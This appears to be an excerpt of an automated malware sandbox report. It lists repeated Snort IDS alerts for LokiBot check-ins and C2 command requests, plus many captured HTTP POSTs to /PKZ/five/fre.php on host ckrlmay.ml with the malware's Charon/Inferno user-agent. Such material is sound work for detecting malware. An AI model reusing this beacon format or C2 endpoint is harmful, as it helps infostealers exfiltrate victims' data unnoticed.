            Source: TrafficSnort IDS: 2021641 ET TROJAN LokiBot User-Agent (Charon/Inferno) 192.168.2.5:49855 -> 104.28.4.154:80
            Source: TrafficSnort IDS: 2025381 ET TROJAN LokiBot Checkin 192.168.2.5:49855 -> 104.28.4.154:80
            Source: TrafficSnort IDS: 2024318 ET TROJAN LokiBot Request for C2 Commands Detected M2 192.168.2.5:49855 -> 104.28.4.154:80
            Source: TrafficSnort IDS: 2024313 ET TROJAN LokiBot Request for C2 Commands Detected M1 192.168.2.5:49856 -> 172.67.187.13:80
            Source: TrafficSnort IDS: 2021641 ET TROJAN LokiBot User-Agent (Charon/Inferno) 192.168.2.5:49856 -> 172.67.187.13:80
            Source: TrafficSnort IDS: 2025381 ET TROJAN LokiBot Checkin 192.168.2.5:49856 -> 172.67.187.13:80
            Source: TrafficSnort IDS: 2024318 ET TROJAN LokiBot Request for C2 Commands Detected M2 192.168.2.5:49856 -> 172.67.187.13:80
            Source: TrafficSnort IDS: 2024313 ET TROJAN LokiBot Request for C2 Commands Detected M1 192.168.2.5:49857 -> 104.28.4.154:80
            Source: TrafficSnort IDS: 2021641 ET TROJAN LokiBot User-Agent (Charon/Inferno) 192.168.2.5:49857 -> 104.28.4.154:80
            Source: TrafficSnort IDS: 2025381 ET TROJAN LokiBot Checkin 192.168.2.5:49857 -> 104.28.4.154:80
            Source: TrafficSnort IDS: 2024318 ET TROJAN LokiBot Request for C2 Commands Detected M2 192.168.2.5:49857 -> 104.28.4.154:80
            Source: TrafficSnort IDS: 2024313 ET TROJAN LokiBot Request for C2 Commands Detected M1 192.168.2.5:49858 -> 172.67.187.13:80
            Source: TrafficSnort IDS: 2021641 ET TROJAN LokiBot User-Agent (Charon/Inferno) 192.168.2.5:49858 -> 172.67.187.13:80
            Source: TrafficSnort IDS: 2025381 ET TROJAN LokiBot Checkin 192.168.2.5:49858 -> 172.67.187.13:80
            Source: TrafficSnort IDS: 2024318 ET TROJAN LokiBot Request for C2 Commands Detected M2 192.168.2.5:49858 -> 172.67.187.13:80
            Source: TrafficSnort IDS: 2024313 ET TROJAN LokiBot Request for C2 Commands Detected M1 192.168.2.5:49859 -> 172.67.187.13:80
            Source: TrafficSnort IDS: 2021641 ET TROJAN LokiBot User-Agent (Charon/Inferno) 192.168.2.5:49859 -> 172.67.187.13:80
            Source: TrafficSnort IDS: 2025381 ET TROJAN LokiBot Checkin 192.168.2.5:49859 -> 172.67.187.13:80
            Source: TrafficSnort IDS: 2024318 ET TROJAN LokiBot Request for C2 Commands Detected M2 192.168.2.5:49859 -> 172.67.187.13:80
            Source: TrafficSnort IDS: 2024313 ET TROJAN LokiBot Request for C2 Commands Detected M1 192.168.2.5:49860 -> 172.67.187.13:80
            Source: TrafficSnort IDS: 2021641 ET TROJAN LokiBot User-Agent (Charon/Inferno) 192.168.2.5:49860 -> 172.67.187.13:80
            Source: TrafficSnort IDS: 2025381 ET TROJAN LokiBot Checkin 192.168.2.5:49860 -> 172.67.187.13:80
            Source: TrafficSnort IDS: 2024318 ET TROJAN LokiBot Request for C2 Commands Detected M2 192.168.2.5:49860 -> 172.67.187.13:80
            Source: TrafficSnort IDS: 2024313 ET TROJAN LokiBot Request for C2 Commands Detected M1 192.168.2.5:49861 -> 104.28.4.154:80
            Source: TrafficSnort IDS: 2021641 ET TROJAN LokiBot User-Agent (Charon/Inferno) 192.168.2.5:49861 -> 104.28.4.154:80
            Source: TrafficSnort IDS: 2025381 ET TROJAN LokiBot Checkin 192.168.2.5:49861 -> 104.28.4.154:80
            Source: TrafficSnort IDS: 2024318 ET TROJAN LokiBot Request for C2 Commands Detected M2 192.168.2.5:49861 -> 104.28.4.154:80
            Source: TrafficSnort IDS: 2024313 ET TROJAN LokiBot Request for C2 Commands Detected M1 192.168.2.5:49862 -> 172.67.187.13:80
            Source: TrafficSnort IDS: 2021641 ET TROJAN LokiBot User-Agent (Charon/Inferno) 192.168.2.5:49862 -> 172.67.187.13:80
            Source: TrafficSnort IDS: 2025381 ET TROJAN LokiBot Checkin 192.168.2.5:49862 -> 172.67.187.13:80
            Source: TrafficSnort IDS: 2024318 ET TROJAN LokiBot Request for C2 Commands Detected M2 192.168.2.5:49862 -> 172.67.187.13:80
            Source: TrafficSnort IDS: 2024313 ET TROJAN LokiBot Request for C2 Commands Detected M1 192.168.2.5:49863 -> 104.28.4.154:80
            Source: TrafficSnort IDS: 2021641 ET TROJAN LokiBot User-Agent (Charon/Inferno) 192.168.2.5:49863 -> 104.28.4.154:80
            Source: TrafficSnort IDS: 2025381 ET TROJAN LokiBot Checkin 192.168.2.5:49863 -> 104.28.4.154:80
            Source: TrafficSnort IDS: 2024318 ET TROJAN LokiBot Request for C2 Commands Detected M2 192.168.2.5:49863 -> 104.28.4.154:80
            Source: TrafficSnort IDS: 2024313 ET TROJAN LokiBot Request for C2 Commands Detected M1 192.168.2.5:49864 -> 172.67.187.13:80
            Source: TrafficSnort IDS: 2021641 ET TROJAN LokiBot User-Agent (Charon/Inferno) 192.168.2.5:49864 -> 172.67.187.13:80
            Source: TrafficSnort IDS: 2025381 ET TROJAN LokiBot Checkin 192.168.2.5:49864 -> 172.67.187.13:80
            Source: TrafficSnort IDS: 2024318 ET TROJAN LokiBot Request for C2 Commands Detected M2 192.168.2.5:49864 -> 172.67.187.13:80
            Source: TrafficSnort IDS: 2024313 ET TROJAN LokiBot Request for C2 Commands Detected M1 192.168.2.5:49865 -> 172.67.187.13:80
            Source: TrafficSnort IDS: 2021641 ET TROJAN LokiBot User-Agent (Charon/Inferno) 192.168.2.5:49865 -> 172.67.187.13:80
            Source: TrafficSnort IDS: 2025381 ET TROJAN LokiBot Checkin 192.168.2.5:49865 -> 172.67.187.13:80
            Source: TrafficSnort IDS: 2024318 ET TROJAN LokiBot Request for C2 Commands Detected M2 192.168.2.5:49865 -> 172.67.187.13:80
            Source: TrafficSnort IDS: 2024313 ET TROJAN LokiBot Request for C2 Commands Detected M1 192.168.2.5:49866 -> 104.28.4.154:80
            Source: TrafficSnort IDS: 2021641 ET TROJAN LokiBot User-Agent (Charon/Inferno) 192.168.2.5:49866 -> 104.28.4.154:80
            Source: TrafficSnort IDS: 2025381 ET TROJAN LokiBot Checkin 192.168.2.5:49866 -> 104.28.4.154:80
            Source: TrafficSnort IDS: 2024318 ET TROJAN LokiBot Request for C2 Commands Detected M2 192.168.2.5:49866 -> 104.28.4.154:80
            Source: TrafficSnort IDS: 2024313 ET TROJAN LokiBot Request for C2 Commands Detected M1 192.168.2.5:49867 -> 172.67.187.13:80
            Source: TrafficSnort IDS: 2021641 ET TROJAN LokiBot User-Agent (Charon/Inferno) 192.168.2.5:49867 -> 172.67.187.13:80
            Source: TrafficSnort IDS: 2025381 ET TROJAN LokiBot Checkin 192.168.2.5:49867 -> 172.67.187.13:80
            Source: TrafficSnort IDS: 2024318 ET TROJAN LokiBot Request for C2 Commands Detected M2 192.168.2.5:49867 -> 172.67.187.13:80
            Source: TrafficSnort IDS: 2024313 ET TROJAN LokiBot Request for C2 Commands Detected M1 192.168.2.5:49868 -> 172.67.187.13:80
            Source: TrafficSnort IDS: 2021641 ET TROJAN LokiBot User-Agent (Charon/Inferno) 192.168.2.5:49868 -> 172.67.187.13:80
            Source: TrafficSnort IDS: 2025381 ET TROJAN LokiBot Checkin 192.168.2.5:49868 -> 172.67.187.13:80
            Source: TrafficSnort IDS: 2024318 ET TROJAN LokiBot Request for C2 Commands Detected M2 192.168.2.5:49868 -> 172.67.187.13:80
            Source: TrafficSnort IDS: 2024313 ET TROJAN LokiBot Request for C2 Commands Detected M1 192.168.2.5:49869 -> 172.67.187.13:80
            Source: TrafficSnort IDS: 2021641 ET TROJAN LokiBot User-Agent (Charon/Inferno) 192.168.2.5:49869 -> 172.67.187.13:80
            Source: TrafficSnort IDS: 2025381 ET TROJAN LokiBot Checkin 192.168.2.5:49869 -> 172.67.187.13:80
            Source: TrafficSnort IDS: 2024318 ET TROJAN LokiBot Request for C2 Commands Detected M2 192.168.2.5:49869 -> 172.67.187.13:80
            Source: TrafficSnort IDS: 2024313 ET TROJAN LokiBot Request for C2 Commands Detected M1 192.168.2.5:49870 -> 172.67.187.13:80
            Source: TrafficSnort IDS: 2021641 ET TROJAN LokiBot User-Agent (Charon/Inferno) 192.168.2.5:49870 -> 172.67.187.13:80
            Source: TrafficSnort IDS: 2025381 ET TROJAN LokiBot Checkin 192.168.2.5:49870 -> 172.67.187.13:80
            Source: TrafficSnort IDS: 2024318 ET TROJAN LokiBot Request for C2 Commands Detected M2 192.168.2.5:49870 -> 172.67.187.13:80
            Source: TrafficSnort IDS: 2024313 ET TROJAN LokiBot Request for C2 Commands Detected M1 192.168.2.5:49871 -> 172.67.187.13:80
            Source: TrafficSnort IDS: 2021641 ET TROJAN LokiBot User-Agent (Charon/Inferno) 192.168.2.5:49871 -> 172.67.187.13:80
            Source: TrafficSnort IDS: 2025381 ET TROJAN LokiBot Checkin 192.168.2.5:49871 -> 172.67.187.13:80
            Source: TrafficSnort IDS: 2024318 ET TROJAN LokiBot Request for C2 Commands Detected M2 192.168.2.5:49871 -> 172.67.187.13:80
            Source: TrafficSnort IDS: 2024313 ET TROJAN LokiBot Request for C2 Commands Detected M1 192.168.2.5:49872 -> 172.67.187.13:80
            Source: TrafficSnort IDS: 2021641 ET TROJAN LokiBot User-Agent (Charon/Inferno) 192.168.2.5:49872 -> 172.67.187.13:80
            Source: TrafficSnort IDS: 2025381 ET TROJAN LokiBot Checkin 192.168.2.5:49872 -> 172.67.187.13:80
            Source: TrafficSnort IDS: 2024318 ET TROJAN LokiBot Request for C2 Commands Detected M2 192.168.2.5:49872 -> 172.67.187.13:80
            Source: TrafficSnort IDS: 2024313 ET TROJAN LokiBot Request for C2 Commands Detected M1 192.168.2.5:49873 -> 104.28.4.154:80
            Source: TrafficSnort IDS: 2021641 ET TROJAN LokiBot User-Agent (Charon/Inferno) 192.168.2.5:49873 -> 104.28.4.154:80
            Source: TrafficSnort IDS: 2025381 ET TROJAN LokiBot Checkin 192.168.2.5:49873 -> 104.28.4.154:80
            Source: TrafficSnort IDS: 2024318 ET TROJAN LokiBot Request for C2 Commands Detected M2 192.168.2.5:49873 -> 104.28.4.154:80
            Source: TrafficSnort IDS: 2024313 ET TROJAN LokiBot Request for C2 Commands Detected M1 192.168.2.5:49874 -> 172.67.187.13:80
            Source: TrafficSnort IDS: 2021641 ET TROJAN LokiBot User-Agent (Charon/Inferno) 192.168.2.5:49874 -> 172.67.187.13:80
            Source: TrafficSnort IDS: 2025381 ET TROJAN LokiBot Checkin 192.168.2.5:49874 -> 172.67.187.13:80
            Source: TrafficSnort IDS: 2024318 ET TROJAN LokiBot Request for C2 Commands Detected M2 192.168.2.5:49874 -> 172.67.187.13:80
            Source: TrafficSnort IDS: 2024313 ET TROJAN LokiBot Request for C2 Commands Detected M1 192.168.2.5:49875 -> 172.67.187.13:80
            Source: TrafficSnort IDS: 2021641 ET TROJAN LokiBot User-Agent (Charon/Inferno) 192.168.2.5:49875 -> 172.67.187.13:80
            Source: TrafficSnort IDS: 2025381 ET TROJAN LokiBot Checkin 192.168.2.5:49875 -> 172.67.187.13:80
            Source: TrafficSnort IDS: 2024318 ET TROJAN LokiBot Request for C2 Commands Detected M2 192.168.2.5:49875 -> 172.67.187.13:80
            Source: global trafficHTTP traffic detected: POST /PKZ/five/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: ckrlmay.mlAccept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: 499A343AContent-Length: 192Connection: close
            Source: global trafficHTTP traffic detected: POST /PKZ/five/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: ckrlmay.mlAccept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: 499A343AContent-Length: 192Connection: close
            Source: global trafficHTTP traffic detected: POST /PKZ/five/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: ckrlmay.mlAccept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: 499A343AContent-Length: 165Connection: close
            Source: global trafficHTTP traffic detected: POST /PKZ/five/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: ckrlmay.mlAccept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: 499A343AContent-Length: 165Connection: close
            Source: global trafficHTTP traffic detected: POST /PKZ/five/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: ckrlmay.mlAccept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: 499A343AContent-Length: 165Connection: close
            Source: global trafficHTTP traffic detected: POST /PKZ/five/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: ckrlmay.mlAccept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: 499A343AContent-Length: 165Connection: close
            Source: global trafficHTTP traffic detected: POST /PKZ/five/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: ckrlmay.mlAccept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: 499A343AContent-Length: 165Connection: close
            Source: global trafficHTTP traffic detected: POST /PKZ/five/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: ckrlmay.mlAccept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: 499A343AContent-Length: 165Connection: close
            Source: global trafficHTTP traffic detected: POST /PKZ/five/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: ckrlmay.mlAccept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: 499A343AContent-Length: 165Connection: close
            Source: global trafficHTTP traffic detected: POST /PKZ/five/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: ckrlmay.mlAccept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: 499A343AContent-Length: 165Connection: close
            Source: global trafficHTTP traffic detected: POST /PKZ/five/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: ckrlmay.mlAccept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: 499A343AContent-Length: 165Connection: close
            Source: global trafficHTTP traffic detected: POST /PKZ/five/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: ckrlmay.mlAccept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: 499A343AContent-Length: 165Connection: close
            Source: global trafficHTTP traffic detected: POST /PKZ/five/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: ckrlmay.mlAccept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: 499A343AContent-Length: 165Connection: close
            Source: global trafficHTTP traffic detected: POST /PKZ/five/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: ckrlmay.mlAccept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: 499A343AContent-Length: 165Connection: close
            Source: global trafficHTTP traffic detected: POST /PKZ/five/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: ckrlmay.mlAccept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: 499A343AContent-Length: 165Connection: close
            Source: global trafficHTTP traffic detected: POST /PKZ/five/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: ckrlmay.mlAccept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: 499A343AContent-Length: 165Connection: close
            Source: global trafficHTTP traffic detected: POST /PKZ/five/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: ckrlmay.mlAccept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: 499A343AContent-Length: 165Connection: close
            Source: global trafficHTTP traffic detected: POST /PKZ/five/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: ckrlmay.mlAccept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: 499A343AContent-Length: 165Connection: close
            Source: global trafficHTTP traffic detected: POST /PKZ/five/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: ckrlmay.mlAccept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: 499A343AContent-Length: 165Connection: close
            Source: global trafficHTTP traffic detected: POST /PKZ/five/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: ckrlmay.mlAccept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: 499A343AContent-Length: 165Connection: close
            Source: global trafficHTTP traffic detected: POST /PKZ/five/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: ckrlmay.mlAccept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: 499A343AContent-Length: 165Connection: close
            Source: global trafficHTTP traffic detected: POST /PKZ/five/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: ckrlmay.mlAccept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: 499A343AContent-Length: 165Connection: close
            Source: global trafficHTTP traffic detected: POST /PKZ/five/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: ckrlmay.mlAccept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: 499A343AContent-Length: 165Connection: close
            Source: global trafficHTTP traffic detected: POST /PKZ/five/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: ckrlmay.mlAccept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: 499A343AContent-Length: 165Connection: close
            Source: global trafficHTTP traffic detected: POST /PKZ/five/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: ckrlmay.mlAccept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: 499A343AContent-Length: 165Connection: close
            Source: global trafficHTTP traffic detected: POST /PKZ/five/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: ckrlmay.mlAccept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: 499A343AContent-Length: 165Connection: close
            Source: global trafficHTTP traffic detected: POST /PKZ/five/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: ckrlmay.mlAccept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: 499A343AContent-Length: 165Connection: close
            Source: global trafficHTTP traffic detected: POST /PKZ/five/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: ckrlmay.mlAccept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: 499A343AContent-Length: 165Connection: close
            Source: global trafficHTTP traffic detected: POST /PKZ/five/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: ckrlmay.mlAccept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: 499A343AContent-Length: 165Connection: close
            Source: global trafficHTTP traffic detected: POST /PKZ/five/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: ckrlmay.mlAccept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: 499A343AContent-Length: 165Connection: close
            Source: global trafficHTTP traffic detected: POST /PKZ/five/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: ckrlmay.mlAccept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: 499A343AContent-Length: 165Connection: close
            Source: global trafficHTTP traffic detected: POST /PKZ/five/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: ckrlmay.mlAccept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: 499A343AContent-Length: 165Connection: close
            Source: global trafficHTTP traffic detected: POST /PKZ/five/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: ckrlmay.mlAccept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: 499A343AContent-Length: 165Connection: close
            Source: global trafficHTTP traffic detected: POST /PKZ/five/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: ckrlmay.mlAccept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: 499A343AContent-Length: 165Connection: close
            Source: global trafficHTTP traffic detected: POST /PKZ/five/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: ckrlmay.mlAccept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: 499A343AContent-Length: 165Connection: close
            Source: global trafficHTTP traffic detected: POST /PKZ/five/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: ckrlmay.mlAccept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: 499A343AContent-Length: 165Connection: close
            Source: global trafficHTTP traffic detected: POST /PKZ/five/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: ckrlmay.mlAccept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: 499A343AContent-Length: 165Connection: close
            Source: global trafficHTTP traffic detected: POST /PKZ/five/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: ckrlmay.mlAccept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: 499A343AContent-Length: 165Connection: close
            Source: global trafficHTTP traffic detected: POST /PKZ/five/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: ckrlmay.mlAccept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: 499A343AContent-Length: 165Connection: close
            Source: global trafficHTTP traffic detected: POST /PKZ/five/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: ckrlmay.mlAccept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: 499A343AContent-Length: 165Connection: close
            Source: global trafficHTTP traffic detected: POST /PKZ/five/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: ckrlmay.mlAccept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: 499A343AContent-Length: 165Connection: close
            Source: global trafficHTTP traffic detected: POST /PKZ/five/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: ckrlmay.mlAccept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: 499A343AContent-Length: 165Connection: close
            Source: global trafficHTTP traffic detected: POST /PKZ/five/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: ckrlmay.mlAccept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: 499A343AContent-Length: 165Connection: close
            Source: global trafficHTTP traffic detected: POST /PKZ/five/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: ckrlmay.mlAccept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: 499A343AContent-Length: 165Connection: close
            Source: global trafficHTTP traffic detected: POST /PKZ/five/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: ckrlmay.mlAccept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: 499A343AContent-Length: 165Connection: close
            Source: global trafficHTTP traffic detected: POST /PKZ/five/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: ckrlmay.mlAccept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: 499A343AContent-Length: 165Connection: close
            Source: global trafficHTTP traffic detected: POST /PKZ/five/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: ckrlmay.mlAccept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: 499A343AContent-Length: 165Connection: close
            Source: global trafficHTTP traffic detected: POST /PKZ/five/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: ckrlmay.mlAccept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: 499A343AContent-Length: 165Connection: close
            Source: global trafficHTTP traffic detected: POST /PKZ/five/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: ckrlmay.mlAccept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: 499A343AContent-Length: 165Connection: close
            Source: global trafficHTTP traffic detected: POST /PKZ/five/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: ckrlmay.mlAccept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: 499A343AContent-Length: 165Connection: close
            Source: global trafficHTTP traffic detected: POST /PKZ/five/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: ckrlmay.mlAccept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: 499A343AContent-Length: 165Connection: close
            Source: global trafficHTTP traffic detected: POST /PKZ/five/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: ckrlmay.mlAccept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: 499A343AContent-Length: 165Connection: close
            Source: global trafficHTTP traffic detected: POST /PKZ/five/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: ckrlmay.mlAccept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: 499A343AContent-Length: 165Connection: close
            Source: global trafficHTTP traffic detected: POST /PKZ/five/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: ckrlmay.mlAccept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: 499A343AContent-Length: 165Connection: close
            Source: global trafficHTTP traffic detected: POST /PKZ/five/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: ckrlmay.mlAccept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: 499A343AContent-Length: 165Connection: close
            Source: global trafficHTTP traffic detected: POST /PKZ/five/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: ckrlmay.mlAccept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: 499A343AContent-Length: 165Connection: close
            Source: global trafficHTTP traffic detected: POST /PKZ/five/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: ckrlmay.mlAccept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: 499A343AContent-Length: 165Connection: close
            Source: global trafficHTTP traffic detected: POST /PKZ/five/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: ckrlmay.mlAccept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: 499A343AContent-Length: 165Connection: close
            Source: global trafficHTTP traffic detected: POST /PKZ/five/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: ckrlmay.mlAccept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: 499A343AContent-Length: 165Connection: close
            Source: global trafficHTTP traffic detected: POST /PKZ/five/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: ckrlmay.mlAccept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: 499A343AContent-Length: 165Connection: close
            Source: global trafficHTTP traffic detected: POST /PKZ/five/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: ckrlmay.mlAccept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: 499A343AContent-Length: 165Connection: close
            Source: global trafficHTTP traffic detected: POST /PKZ/five/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: ckrlmay.mlAccept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: 499A343AContent-Length: 165Connection: close
            Source: global trafficHTTP traffic detected: POST /PKZ/five/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: ckrlmay.mlAccept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: 499A343AContent-Length: 165Connection: close
            Source: global trafficHTTP traffic detected: POST /PKZ/five/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: ckrlmay.mlAccept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: 499A343AContent-Length: 165Connection: close
            Source: global trafficHTTP traffic detected: POST /PKZ/five/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: ckrlmay.mlAccept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: 499A343AContent-Length: 165Connection: close
            Source: global trafficHTTP traffic detected: POST /PKZ/five/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: ckrlmay.mlAccept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: 499A343AContent-Length: 165Connection: close
            Source: global trafficHTTP traffic detected: POST /PKZ/five/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: ckrlmay.mlAccept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: 499A343AContent-Length: 165Connection: close
            Source: global trafficHTTP traffic detected: POST /PKZ/five/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: ckrlmay.mlAccept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: 499A343AContent-Length: 165Connection: close
            Source: global trafficHTTP traffic detected: POST /PKZ/five/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: ckrlmay.mlAccept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: 499A343AContent-Length: 165Connection: close
